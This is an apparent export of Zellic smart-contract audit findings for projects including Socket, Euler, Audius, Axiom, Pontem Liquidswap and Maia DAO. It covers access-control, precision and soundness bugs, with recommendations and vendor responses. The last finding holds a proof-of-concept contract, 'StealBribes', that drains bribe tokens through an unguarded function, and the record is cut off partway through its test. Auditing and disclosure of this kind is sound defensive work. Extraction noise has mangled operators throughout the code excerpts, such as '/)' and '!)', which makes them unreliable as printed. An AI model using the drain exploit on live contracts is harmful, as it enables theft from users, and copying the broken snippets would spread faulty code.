likely to happen in a volatile market. There are a number of protections implemented that may make an arbitrage oppor- tunity with Socket Data Layer less trivial to exploit: Socket Technology noted that the fee updater will quickly submit signatures to try to keep the price as up-to-date as possible. There is the existence of the maximum msgValue threshold: 1 In arbitrage, there may be one or more intermediate exchange(s) used in a chain to maximize prof- itability. But the minimum number of exchanges required is two. Zellic Socket Technology if (msgValue > msgValueMaxThreshold[siblingChainSlug_]) revert MsgValueTooHigh(); Cross-chain message transfers do not occur immediately. Any delay leaves room for more price disparities between the involved exchanges, potentially ending the opportunity and causing a loss to the arbitrageur. 
However, none of these eliminates the possibility of an arbitrage opportunity; while these measures may mitigate the ease of exploitation, if the price ratio is not updated atomically (i.e., within the same transaction) before sending a packet, the potential for a price difference exists. Additionally, the maximum msgValue threshold can be bypassed by sending many messages in the same packet, splitting transmission fees. The cross-chain message transfer may not be instant, but the Socket Data Layer ex- change occurs immediately on the sending chain. Only, the output native coin is es- sentially redeemed once the message arrives on the destination chain. So, if the other exchange is on the source chain, the arbitrage attack can be atomically executed. For many exchanges, arbitrage is generally beneficial because of its role in promoting market efficiency and price convergence; that is, arbitrageurs facilitate the alignment of asset values across decentralized exchanges, reducing spreads. However, Socket Data Layer does not operate an order book and swaps do not impact pricing, so arbitrage against it does not resolve price inefficiencies and potentially has negative impact on the executors who provide the msg.value liquidity on the destina- tion chain. When successfully executed, the arbitrageur \u201cwins\u201d the price difference between the trade. This value must come from somewhere \u2014\u2013 and the \u201closers\u201d are the liquidity providers who lost their liquidity to a bad trade. In Socket Data Layer\u2019s case, the executors ultimately provide the native coin to the destination chain, so they are the entity negatively impacted by the fee updater\u2019s slow response. Assuming no limit to the number of messages that can be sent during a price inef- ficiency, the profits are only limited by how many native coins the executor is able to provide on the destination chain. Once the executors run out of destination chain native coins, the arbitrage opportunity closes. Zellic Socket Technology Ensure executors evaluate whether the fees paid for the msgValue transfer are satis- factory before executing the message on chain. Set up monitoring to ensure other on-chain oracles\u2019 prices do not vary too much fron the fee updater oracle\u2019s prices. Socket Technology acknowledged this finding, noting: msgValue checks are already in [the execution client] to check it before execution and we are working on the monitoring system. 
Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Random address recovered from ECDSA\u2019s signature recov- ery may be used for executor fee accounting", + "labels": [ + "Zellic" + ], + "body": "Target: OpenExecutionManager Category: Coding Mistakes Likelihood: Low Severity: Low : Low In OpenExecutionManager, the NatSpec for isExecutor states the following: /** * @notice This function allows all executors * @notice The executor recovered here can be a random address hence should not be used for fee accounting * @param packedMessage Packed message to be executed * @param sig Signature of the message * @return executor Address of the executor * @return isValidExecutor Boolean value indicating whether the executor is valid or not *) function isExecutor( bytes32 packedMessage, bytes memory sig ) external view override returns (address executor, bool isValidExecutor) { executor = signatureVerifier__.recoverSigner(packedMessage, sig); isValidExecutor = true; } Specifically, the notice The executor recovered here can be a random address henc e should not be used for fee accounting is important. The address returned by this function is used within _execute() when updating the executor\u2019s fee accounting: executionManager__.updateExecutionFees( executor_, /) Zellic: this address is from isExecutor() Zellic Socket Technology uint128(messageDetails_.executionFee), messageDetails_.msgId ); If the address recovered is random, the accounting would be incorrect. Document prominently above the isExecutor() function, or alternatively above the call to updateExecutionFees() in _execute(), that executors must provide a valid sig- nature that recovers to their address, as otherwise the executor fee accounting will be done incorrectly. This issue has been acknowledged by Socket Technology, and a fix was implemented in commit 00688523. They have also stated that executor\u2019s nodes will go through rigorous testing that should catch any issues like this. 
Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.5 ExecutionManager should assert function requirements", + "labels": [ + "Zellic" + ], + "body": "Target: ExecutionManager Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The payAndCheckFees function uses the maxPacketLength_ argument to reduce the transmission fees to split the fee between messages in the packet: function payAndCheckFees( uint256 minMsgGasLimit_, uint256 payloadSize_, bytes32 executionParams_, bytes32, uint32 siblingChainSlug_, uint128 switchboardFees_, uint128 verificationOverheadFees_, address transmitManager_, address switchboard_, uint256 maxPacketLength_ ) { external payable override returns (uint128 executionFee, uint128 transmissionFees) if (msg.value >) type(uint128).max) revert InvalidMsgValue(); uint128 msgValue = uint128(msg.value); /) transmission fees are per packet, so need to divide by number of messages per packet transmissionFees = transmissionMinFees[transmitManager_][siblingChainSlug_] / uint128(maxPacketLength_); This value is ultimately passed from the SocketSrc.outbound function, where it is fetched from the capacitor: Zellic Socket Technology function outbound( uint32 siblingChainSlug_, uint256 minMsgGasLimit_, bytes32 executionParams_, bytes32 transmissionParams_, bytes calldata payload_ ) external payable override returns (bytes32 msgId) { /) [...))] /) fetches auxillary details for the message from the plug config plugConfig.capacitor__ = _plugConfigs[msg.sender][siblingChainSlug_] .capacitor__; /) [...))] ISocket.Fees memory fees = _validateAndSendFees( minMsgGasLimit_, uint256(payload_.length), executionParams_, transmissionParams_, plugConfig.outboundSwitchboard__, plugConfig.capacitor__.getMaxPacketLength(), /) Zellic: this is `maxPacketLength_` siblingChainSlug_ ); During our assessment, there were only two capacitor/decapacitor pairs available to deploy through CapacitorFactory: SingleCapacitor \u2014 hardcoded maximum packet length of 1. HashChainCapacitor \u2014 variable maximum packet length between 0[2] and Hash ChainCapacitor.MAX_LEN: constructor( address socket_, address owner_, uint256 maxPacketLength_ 2 Though HashChainCapacitor is out of scope, we wanted to document the possibility of a division by zero in the transmission fee splitting because the maximum packet length can be zero. Zellic Socket Technology ) BaseCapacitor(socket_, owner_) { if (maxPacketLength > MAX_LEN) revert InvalidPacketLength(); maxPacketLength = maxPacketLength_; } There are currently limits on the maxPacketLength. However, there is risk of a future capacitor/decapacitor pair being written that does not enforce a maximum packet length because the variable is checked at the capacitor level. If a maxPacketLength were greater than the transmission fees, no transmission fees would be paid. Additionally, a tiny amount of transmission fees are regularly lost in precision from the division. As the transmission fees decrease or maxPacketLength increases, the division loses precision, and fees are lost because the division rounds down. We recommend the following: Enforce a maximum value for maxPacketLength as a payAndCheckFees function requirement or in CapacitorFactory when deploying the capacitor/decapacitor contract pair. Enforce a minimum value transmission fee, though keep it relatively insignificant. 
This ensures parties are properly compensated even in cases of high maxPacket Length values. Round the division up to prevent transmission fee losses due to precision. Socket Technology acknowledged this finding, adding that they will add the maxP acketLength check in CapacitorFactory. This change was implemented in commit 83d6d0af. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Risk of proof type confusion", + "labels": [ + "Zellic" + ], + "body": "Target: SocketDst Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The Socket Data Layer protocol supports capacitors and decapacitors. Capacitors are used on the sending chain to pack packets into messages. These messages can then be sealed by transmitters and subsequently transmitted to a remote chain. A decapacitor on the remote chain would then be able to unpack this message so that it may be executed. There are currently two types of capacitors: SingleCapacitor HashChainCapacitor A plug can choose to change the capacitors it uses by simply changing the switch- boards that it is using (which is what the capacitors and decapacitors are connected to). This can be done without any restrictions at any point in time. Currently, the two capacitor and decapacitor implementations are mutually exclusive. That is to say that a packed message packed by the SingleCapacitor would fail to be unpacked by the HashChainDecapacitor. This is what the ideal scenario is. However, it is possible that with future implementations of new capacitor types, a message packed by one capacitor may actually be able to be unpacked by a com- pletely different decapacitor. In this case, the unpacked message would very likely not match the original message that was sent, and therefore an arbitrary message may get executed. There is no immediate risk presented by the capacitors and decapacitors in scope, but we recommend that Socket Data Layer be very careful when introducing new types of capacitors. Ensure that all implemented capacitors are mutually exclusive (as they are now), or consider adding restrictions on when a plug can change its switchboard implementations. Additionally, consider adding type information to packets that specifies which capaci- Zellic Socket Technology tor generated the proof and thus which decapacitor should be used to verify message inclusion using the proof. This would eliminate this class of threat entirely because type confusion would no longer be possible. Socket Technology acknowledged this finding, noting that users should only use vet- ted and reputable plugs, and such plugs should pause functionality and take care of all in-flight messages prior to changing switchboards. They also noted that changing switchboards should be a fairly rare occurrence: Switchboard change is expected to be rare. Plugs would have to pause new messages and finish all in flight ones before they change it for graceful migration. 
Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Gas optimization for switchboard registration", + "labels": [ + "Zellic" + ], + "body": "Target: SwitchboardBase Category: Gas Optimization Likelihood: N/A Severity: Informational : Informational Within the registerSiblingSlug() function of NativeSwitchboardBase, there is an al- ready initialized check: function registerSiblingSlug(/) ...)) *)) external override onlyRole(GOVERNANCE_ROLE) { if (isInitialized) revert AlreadyInitialized(); initialPacketCount = initialPacketCount_; (address capacitor, ) = socket__.registerSwitchboardForSibling(/) ...)) *)); isInitialized = true; capacitor__ = ICapacitor(capacitor); remoteNativeSwitchboard = remoteNativeSwitchboard_; } This check is here because the registerSwitchboardForSibling() function that is called on the socket__ can only be called once. This initialization check prevents gas from being wasted on an unnecessary call if the switchboard has already been regis- tered. The above check is nonexistent in the corresponding SwitchboardBase contract, which can lead to a waste of a small amount of gas if the switchboard owner calls registerSiblingSlug() after the switchboard has already been initialized. Consider adding an initialization check in the registerSiblingSlug() function within the SwitchboardBase contract. Zellic Socket Technology This issue has been acknowledged by Socket Technology. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Single-step ownership transfer may cause loss of contract ownership", + "labels": [ + "Zellic" + ], + "body": "Target: EulerClaims.sol Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The transferOwnership() function is used to transfer ownership of the contract to a different address. This is done in a single step, meaning that the ownership is fully transferred after this function is called. function transferOwnership(address newOwner) external onlyOwner { require(newOwner !) address(0), \"owner is zero\"); owner = newOwner; emit OwnerChanged(newOwner); } The function checks that the new owner is not set to address(0) to prevent an erro- neous transfer of ownership. However, there is still a risk that the owner may input an incorrect address for the new owner, either due to a typo or other mistakes. If this happens, it can result in a loss of ownership of the contract, potentially leading to unclaimed funds being permanently locked into the contract. Consider using a two-step ownership transfer mechanism. See OpenZeppelin\u2019s im- plementation of Ownable2Step here. This issue has been acknowledged by Euler Labs Ltd.. Zellic Euler Labs Ltd. 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the smart contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. 
The absence of a threat model in this section does not necessarily suggest that a function is safe.", "html_url": "https://github.com/Zellic/publications/blob/master/Euler - Zellic Audit Report.pdf" }, { "title": "4.1 Module: EulerClaims.sol Function: claimAndAgreeToTerms(bytes32 acceptanceToken, uint256 index, TokenAmount tokenAmounts, bytes32[] proof) Used by users to claim their redemption tokens. Inputs", "labels": [ "Zellic" ], "body": " acceptanceToken \u2013 Control: Fully controlled. \u2013 Constraints: Must be a hash of the user\u2019s address concatenated with a preset terms and conditions hash. \u2013 : Reverts if this is not correct. index \u2013 Control: Fully controlled. \u2013 Constraints: Used to verify the Merkle proof, so it cannot be forged. \u2013 : Reverts if forged. tokenAmounts \u2013 Control: Fully controlled. \u2013 Constraints: Used to verify the Merkle proof, so it cannot be forged. \u2013 : Reverts if forged. proof \u2013 Control: Fully controlled. \u2013 Constraints: The proof that the other inputs are verified against. Cannot be forged, as it is used to get back to the Merkle root. \u2013 : Reverts if forged. Branches and code coverage (including function calls) Intended branches Simple Merkle tree works correctly. \u2713 Test coverage Large Merkle tree works correctly. \u2713 Test coverage Negative behavior Reverts if terms and conditions were not accepted. \u2713 Negative test Reverts if an invalid proof is passed in. \u2713 Negative test Reverts if an invalid index is passed in. \u2713 Negative test Reverts if the user claiming the tokens is not eligible for them. \u2713 Negative test Reverts if tokenAmounts is forged or tampered with. \u2713 Negative test 5 Audit Results At the time of our audit, the code was not deployed to mainnet Ethereum. During our audit, we discovered two findings. Both were suggestions (informational). Euler Labs Ltd. acknowledged all findings and implemented fixes.", "html_url": "https://github.com/Zellic/publications/blob/master/Euler - Zellic Audit Report.pdf" }, { "title": "3.1 Voting can potentially be influenced via restaking", "labels": [ "Zellic" ], "body": " Target: GovernanceV2 Category: Business Logic Likelihood: Low Severity: High : High Currently, the magnitude of a vote is determined when it is submitted, based on the total stake of the user that submits the vote. function submitVote(uint256 _proposalId, Vote _vote) external { // ... address voter = msg.sender; // ... // Require voter has non-zero total active stake uint256 voterActiveStake = _calculateAddressActiveStake(voter); require( voterActiveStake > 0, \u201cGovernance: Voter must be address with non-zero total active stake.\u201d ); // Record vote proposals[_proposalId].votes[voter] = _vote; // Record voteMagnitude for voter proposals[_proposalId].voteMagnitudes[voter] = voterActiveStake; // ... } function _calculateAddressActiveStake(address _address) private view returns (uint256) { 
ServiceProviderFactory spFactory = ServiceProviderFactory(serviceProviderFactoryAddress); DelegateManager delegateManager = DelegateManager(delegateManagerAddress); // Amount directly staked by address, if any, in ServiceProviderFactory (uint256 directDeployerStake,,,,,) = spFactory.getServiceProviderDetails(_address); // Amount of pending decreasedStakeRequest for address, if any, in ServiceProviderFactory (uint256 lockedDeployerStake,) = spFactory.getPendingDecreaseStakeRequest(_address); // active deployer stake = (direct deployer stake - locked deployer stake) uint256 activeDeployerStake = directDeployerStake.sub(lockedDeployerStake); // Total amount delegated by address, if any, in DelegateManager uint256 totalDelegatorStake = delegateManager.getTotalDelegatorStake(_address); // Amount of pending undelegateRequest for address, if any, in DelegateManager (,uint256 lockedDelegatorStake, ) = delegateManager.getPendingUndelegateRequest(_address); // active delegator stake = (total delegator stake - locked delegator stake) uint256 activeDelegatorStake = totalDelegatorStake.sub(lockedDelegatorStake); // activeStake = (activeDeployerStake + activeDelegatorStake) uint256 activeStake = activeDeployerStake.add(activeDelegatorStake); return activeStake; } As currently designed, there are no checks on whether the staking/unstaking locking period is greater than the voting period. Imagine the following scenario: 1. User A votes \u201cYES\u201d on a proposal, then unstakes their share and transfers it to user B. 2. User B stakes, then votes \u201cYES\u201d on the same proposal, effectively pumping the voting weight. 3. The process could repeat over and over, as long as the staking/unstaking locking periods fit in the voting period of the proposal. As discussed with the Audius team, we determined that currently the contracts are secure, since the staking lockup period is greater than the voting period. This means that although the attack may theoretically be possible under specific circumstances (e.g., a staking locking period far shorter than the voting period of a proposal), it is impossible to perform as per the current state of the contracts. The fix, as proposed by the Audius team, would be to enforce that the unstake period is always greater than the voting period of a proposal. The issue has been addressed in pull request 4358. Zellic Tiki Labs Inc.", "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" }, { "title": "3.2 Initialize check is missing from some functions", "labels": [ "Zellic" ], "body": " Target: DelegateManager(V2), WormholeClient Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The _requireIsInitialized function is available in contracts that inherit the InitializableV2 contract and is used to ensure that the child contract has been initialized before performing any other function call. Currently, the cancelRemoveDelegatorRequest in DelegateManagerV2 and DelegateManager and transferTokens in WormholeClient miss this important check. There are no direct security implications of these omissions; however, unlike the rest of the contracts' functions, the ones that omit the check will not revert when called before initialization. In order to keep a consistent code design and follow best practices over all the contracts and their functions, we recommend adding the _requireIsInitialized function call in the two functions mentioned above, as shown below. 
// DelegateManagerV2.sol, DelegateManager.sol function cancelRemoveDelegatorRequest(address _serviceProvider, address _delegator) external { _requireIsInitialized(); require( msg.sender == _serviceProvider || msg.sender == governanceAddress, ERROR_ONLY_SP_GOVERNANCE ); require( removeDelegatorRequests[_serviceProvider][_delegator] != 0, \u201cDelegateManager: No pending request\u201d ); // Reset lockup expiry removeDelegatorRequests[_serviceProvider][_delegator] = 0; emit RemoveDelegatorRequestCancelled(_serviceProvider, _delegator); } // WormholeClient.sol function transferTokens( address from, uint256 amount, uint16 recipientChain, bytes32 recipient, uint256 arbiterFee, uint deadline, uint8 v, bytes32 r, bytes32 s ) public { _requireIsInitialized(); // ... The issues have been addressed in pull request 4360. Zellic Tiki Labs Inc.", "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" }, { "title": "3.3 Stake contract address should not change once set", "labels": [ "Zellic" ], "body": " Target: Project-wide Category: Business Logic Likelihood: N/A Severity: Medium : Medium Currently, the address of the staking contract is stored in a variable called stakingAddress and can be set via the setStakingAddress function, an action that can only be performed by the governanceAddress. There is no check put in place, however, on whether the stakingAddress has been previously set or not. Changing the staking address after users have already interacted with it may result in significant confusion between the user and the contracts they are supposed to interact with. This is mainly because the accounts mapping, which stores the amounts staked by each user, would not reflect what the user has staked in the initial Staking contract. We strongly recommend that once set, the stakingAddress should not be changeable. function setStakingAddress(address _stakingAddress) external { _requireIsInitialized(); require(stakingAddress == address(0), ERROR_STAKING_ALREADY_SET); require(msg.sender == governanceAddress, ERROR_ONLY_GOVERNANCE); stakingAddress = _stakingAddress; emit StakingAddressUpdated(_stakingAddress); } The issues have been addressed in pull request 4362. Zellic Tiki Labs Inc.", "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" }, { "title": "3.4 Unused allowance", "labels": [ "Zellic" ], "body": " Target: ClaimsManager Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The initiateRound function approves a transfer; however, this allowance is not used by the safeTransfer. function initiateRound() external { ... audiusToken.mint(address(this), recurringCommunityFundingAmount); // Approve transfer to community pool address audiusToken.approve(communityPoolAddress, recurringCommunityFundingAmount); // Transfer to community pool address ERC20(address(audiusToken)).safeTransfer(communityPoolAddress, recurringCommunityFundingAmount); ... This allows communityPoolAddress to receive twice the allotted claims from the claimsManager. Currently this does not pose an active security issue, as EthRewardsManager is only managed by governance; however, if the communityPoolAddress changed, this could result in a more severe vulnerability. Remove the approval, or use safeTransferFrom instead of safeTransfer. The issue has been addressed in pull request 4359. 
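A sketch of the simpler of the two fixes: since the tokens are minted to the ClaimsManager itself, the contract can transfer its own balance and the approval can be dropped entirely.

function initiateRound() external {
    // ...
    audiusToken.mint(address(this), recurringCommunityFundingAmount);
    // no approve needed: safeTransfer spends the contract's own balance,
    // so no stray allowance is left for communityPoolAddress to pull later
    ERC20(address(audiusToken)).safeTransfer(communityPoolAddress, recurringCommunityFundingAmount);
    // ...
}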
Zellic Tiki Labs Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Inconsistent usage of SafeMath", + "labels": [ + "Zellic" + ], + "body": "Target: Project-wide Category: Coding Mistakes Likelihood: Low Severity: Low : Low Solidity version 0.5 does not have inbuilt overflow or underflow protections. As a consequence of this, SafeMath should be used in areas where overflow or underflow are not the intended behavior, such that the operations revert safely. As an example, underflow protection should be implemented in the function below: function _removeFromInProgressProposals(uint256 _proposalId) internal { ...)) inProgressProposals[index] = inProgressProposals[inProgressProposals.length - 1]; inProgressProposals.pop(); } In the areas affected, we only noted reverts; however, future commits could change the behaviour of certain affected functions, leading to more severe vulnerabilities. Use SafeMath wherever overflow is not intended behavior. The issue has been fixed in pull request 4361. Zellic Tiki Labs Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The decompose_rlp_array_phase1 is missing in receipt-query circuits", + "labels": [ + "Zellic" + ], + "body": "Target: receipt/circuit.rs Category: Coding Mistakes Likelihood: High Severity: High : High The receipt circuit deals with the receipts and the parsing of receipts into various fields and logs as well as the parsing of logs into topics and data. One of the main functions inside the receipt-query circuit is the parse_log function, which parses a log by de- composing the RLP encoded byte array into a list of addresses, topics, and data. The topics byte array is then once again RLP decoded into a list of topics. These two RLP decompositions are done via the RlpChip\u2019s decompose_rlp_array_phase0. However, unlike every other usage of decompose_rlp_array_phase0, there is no corre- sponding decompose_rlp_array_phase1 being done on the RlpArrayWitness at the relevant phase. This leads to a soundness issue. The RLP decomposition of the logs into addresses, topics, and data and the RLP de- composition of topics into a variable length list of topics is underconstrained. We recommend adding the decompose_rlp_array_phase1 calls appropriately to avoid soundness vulnerabilities. This issue has been acknowledged by Axiom, and fixes were implemented in the fol- lowing commits: 4f73b7bb 5985b263 Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom November - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Implicit precision loss in stable_curve:)lp_value", + "labels": [ + "Zellic" + ], + "body": "Target: liquidswap::stable_curve Category: Business Logic Likelihood: Low Severity: Low : Low In stable_curve:)lp_value, coins with more than eight decimals experience implicit precision loss. 
The current implementation returns the LP value scaled by (10 ^ 8) ^ 4 in order to maintain precision across division: public fun lp_value(x_coin: u128, x_scale: u64, y_coin: u128, y_scale: u64): U256 { let x_u256 = u256:)from_u128(x_coin); let y_u256 = u256:)from_u128(y_coin); let u2561e8 = u256:)from_u128(ONE_E_8); let x_scale_u256 = u256:)from_u64(x_scale); let y_scale_u256 = u256:)from_u64(y_scale); let _x = u256:)div( u256:)mul(x_u256, u2561e8), x_scale_u256, ); let _y = u256:)div( u256:)mul(y_u256, u2561e8), y_scale_u256, ); let _a = u256:)mul(_x, _y); /) ((_x * _x) / 1e18 + (_y * _y) / 1e18) let _b = u256:)add( u256:)mul(_x, _x), u256:)mul(_y, _y), ); u256:)mul(_a, _b) } Zellic Pontem Network However, this means that stable_curve:)lp_value will return inaccurate values when coins have more decimals. Loss of precision in LP value calculations can cause fees to be unexpectedly high: Sit- uations where a swap would theoretically increase LP value might fail. This precision loss will also affect the accuracy of router functions. When coins have more than eight decimals, either rounding should be handled ex- plicitly or they should be disallowed from the protocol. Another option is to use the numerator max(x_scale, y_scale) instead of 10 ^ 8 to mitigate precision loss. Still, coins with unusually high precision would need to be either disallowed or explicitly considered in order to avoid overflow problems. This issue has been acknowledged by Pontem Network. Zellic Pontem Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Pontem Liquidswap - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Incorrect rounding behavior in router:)get_coin_in_with_ fees", + "labels": [ + "Zellic" + ], + "body": "Target: liquidswap::router Category: Coding Mistakes Likelihood: Low Severity: Low : Low In the function router:)get_coin_in_with_fees, the result is rounded up incorrectly for both stable and uncorrelated curves, which can lead to an undue amount being paid in fees. The formula for rounding up integer division is (n - 1)/d + 1 for n > 0. let coin_in = (stable_curve:)coin_in( (coin_out as u128), scale_out, scale_in, (reserve_out as u128), (reserve_in as u128), ) as u64) + 1; (coin_in * fee_scale / fee_multiplier) + 1 The stable curve branch of router:)get_coin_in_with_fees does not correctly imple- ment the formula stated above. let coin_in = math:)mul_div( coin_out, /) y reserve_in * fee_scale, /) rx * 1000 new_reserves_out /) (ry - y) * 997 ) + 1; Furthermore, the uncorrelated curve branch also incorrectly implements the formula stated above. For certain swap amounts, a user could end up paying more in fees than would be accurate. Zellic Pontem Network In the case of the stable curve branch of router:)get_coin_in_with_fees, the code should be rewritten to adhere to the rounded up integer division formula. let coin_in = (stable_curve:)coin_in( (coin_out as u128), scale_out, scale_in, (reserve_out as u128), (reserve_in as u128), ) as u64); let n = coin_in * fee_scale; if (n > 0) { ((n - 1) / fee_multiplier) + 1 } else { } Likewise, the uncorrelated curve branch also needs a revision. /) add to liquidswap:)math public fun mul_div_rounded_up(x: u64, y: u64, z: u64): u64 { assert!(z !) 
0, ERR_DIVIDE_BY_ZERO); let n = (x as u128) * (y as u128); let r = if (n > 0) { ((n - 1) / (z as u128)) + 1 } else { } (r as u64) } let coin_in = math:)mul_div_rounded_up( coin_out, /) y reserve_in * fee_scale, /) rx * 1000 new_reserves_out /) (ry - y) * 997 ); Zellic Pontem Network Pontem Network fixed this issue in commit 0b01ed6 Zellic Pontem Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Pontem Liquidswap - Zellic Audit Report.pdf" + }, + { + "title": "3.4 lp_account:)retrieve_signer_cap should be a friend to liq uidity_pool", + "labels": [ + "Zellic" + ], + "body": "Target: liquidswap::lp_account Category: Coding Mistakes Likelihood: Low Severity: Low : Low The function lp_account:)retrieve_signer_cap can currently be called by any mod- ule. If lp_account:)retrieve_signer_cap is called by a function other than liquidity_ pool:)initialize, then the initialization process of Liquidswap will be unable to move forward. The initialization of Liquidswap can be griefed. This will make liquidswap inaccessible to any users. The function lp_account:)retrieve_signer_cap needs to be marked as pub(friend), and the module liquidswap:)liquidity_pool needs to be added as a friend to liquid swap:)lp_account. This issue has been acknowledged by Pontem Network. Zellic Pontem Network 4 Formal Verification The Move language is designed to support formal verifications against specifications. Currently, there are a number of these written for the liquidswap:)math module. We encourage further verification of contract functions as well as some improvements to current specifications. Here are some examples. 4.1 liquidswap:)math First, the specification for math:)overflow_add could be improved. The purpose of this function is to add u128 integers, but allowing for overflow. spec overflow_add { ensures result <) MAX_U128; ensures a + b <) MAX_U128 ==> result =) a + b; ensures a + b > MAX_U128 ==> result !) a + b; ensures a + b > MAX_U128 &) a < (MAX_U128 - b) ==> result =) a - (MAX_U128 - b) - 1; ensures a + b > MAX_U128 &) b < (MAX_U128 - a) ==> result =) b - (MAX_U128 - a) - 1; ensures a + b <) MAX_U128 ==> result =) a + b; } However, this does not reflect how the function should work conceptually. Instead, consider the following specification: spec overflow_add { ///)) The function should never abort. aborts_if false; ///)) Addition should overflow if the sum exceeds `MAX_U128` ensures result =) (a + b) % (MAX_U128 + 1); } This checks that the function cannot abort and makes the desired functionality more clear. Zellic Pontem Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Pontem Liquidswap - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing access control on addGaugetoFlywheel", + "labels": [ + "Zellic" + ], + "body": "Target: BribesFactory Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The BribesFactory has a method to add a gauge to an existing flywheel: function addGaugetoFlywheel(address gauge, address bribeToken) external { if (address(flywheelTokens[bribeToken]) =) address(0)) createBribeFlywheel(bribeToken); flywheelTokens[bribeToken].addStrategyForRewards(ERC20(gauge)); } There is no access control on this method, allowing anyone to add a gauge that will end up as a strategy for rewards on the flywheel. Using a malicious strategy, it is possible for an attacker to use a single bHermes token to steal all the bribe tokens from the flywheel rewards contract. 
This is because gaugeWeight.incrementGauge does not check that the gauge is in the allowlist (see 3.15), allowing the attacker to boost their malicious strategy and cause flywheelBooster.boostedTotalSupply(strategy) to return a value of 1 when accruing the strategy and user: function accrueStrategy(ERC20 strategy, uint256 state) private returns (uint256 rewardsIndex) { uint256 strategyRewardsAccrued = _getAccruedRewards(strategy); rewardsIndex = state; if (strategyRewardsAccrued > 0) { uint256 supplyTokens = address(flywheelBooster) != address(0) ? flywheelBooster.boostedTotalSupply(strategy) : strategy.totalSupply(); uint224 deltaIndex; if (supplyTokens != 0) deltaIndex = ((strategyRewardsAccrued * ONE) / supplyTokens).toUint224(); rewardsIndex += deltaIndex; strategyIndex[strategy] = rewardsIndex; } } function accrueUser(ERC20 strategy, address user, uint256 index) private returns (uint256) { uint256 supplierIndex = userIndex[strategy][user]; userIndex[strategy][user] = index; if (supplierIndex == 0) { supplierIndex = ONE; } uint256 deltaIndex = index - supplierIndex; uint256 supplierTokens = address(flywheelBooster) != address(0) ? flywheelBooster.boostedBalanceOf(strategy, user) : strategy.balanceOf(user); uint256 supplierDelta = (supplierTokens * deltaIndex) / ONE; uint256 supplierAccrued = rewardsAccrued[user] + supplierDelta; rewardsAccrued[user] = supplierAccrued; emit AccrueRewards(strategy, user, supplierDelta, index); return supplierAccrued; } As flywheelBooster.boostedTotalSupply(strategy) is equal to flywheelBooster.boostedBalanceOf(strategy, user), the user is rewarded all of the tokens from _getAccruedRewards(strategy), and this value comes directly from the malicious strategy, allowing the user to take all of the bribe tokens. 
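A minimal sketch of the missing access control; the gaugeFactory variable and Unauthorized error are our illustration, while the onlyGaugeFactory modifier is named by the recommendation below:

address public immutable gaugeFactory; // illustrative: set to the factory at deployment

modifier onlyGaugeFactory() {
    // only the gauge factory may register new reward strategies
    if (msg.sender != gaugeFactory) revert Unauthorized();
    _;
}

function addGaugetoFlywheel(address gauge, address bribeToken) external onlyGaugeFactory {
    if (address(flywheelTokens[bribeToken]) == address(0)) createBribeFlywheel(bribeToken);
    flywheelTokens[bribeToken].addStrategyForRewards(ERC20(gauge));
}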
To confirm this finding, we wrote the following test case: contract StealBribes { Zellic Maia DAO UniswapV3GaugeFactory uniswapV3GaugeFactory; address bribeToken; bHermesGauges gaugeWeight; function accrueBribes(address user) public {} function getRewards() public returns (uint) { FlywheelCore flywheel = uniswapV3GaugeFactory.bribesFactory().flywheelTokens(bribeToken); return ERC20(bribeToken).balanceOf(flywheel.flywheelRewards()); } function steal(UniswapV3GaugeFactory _uniswapV3GaugeFactory, address _bribeToken, bHermesGauges _gaugeWeight) external { uniswapV3GaugeFactory = _uniswapV3GaugeFactory; bribeToken = _bribeToken; gaugeWeight = _gaugeWeight; bHermes bHermes = bHermes(gaugeWeight.bHermes()); bHermes.claimWeight(1); gaugeWeight.incrementDelegation(address(this), 1); gaugeWeight.incrementGauge(address(this), 1); uniswapV3GaugeFactory.bribesFactory().addGaugetoFlywheel(address(this), bribeToken); FlywheelCore flywheel = uniswapV3GaugeFactory.bribesFactory().flywheelTokens(bribeToken); FlywheelBribeRewards(flywheel.flywheelRewards()) .setRewardsDepot(SingleRewardsDepot(address(this))); flywheel.accrue(ERC20(address(this)), address(this)); flywheel.claimRewards(address(this)); } } function testBribeGauge() external { MockERC20 bribeToken = new MockERC20(\u201ctest bribe token\u201d, \u201cBTKN\u201d, 18); uniswapV3GaugeFactory.bribesFactory() .createBribeFlywheel(address(bribeToken)); FlywheelCore flywheel = uniswapV3GaugeFactory.bribesFactory() .flywheelTokens(address(bribeToken)); Zellic Maia DAO FlywheelBribeRewards bribeRewards = FlywheelBribeRewards(flywheel.flywheelRewards()); bribeToken.mint(address(bribeRewards), 100000 ether); 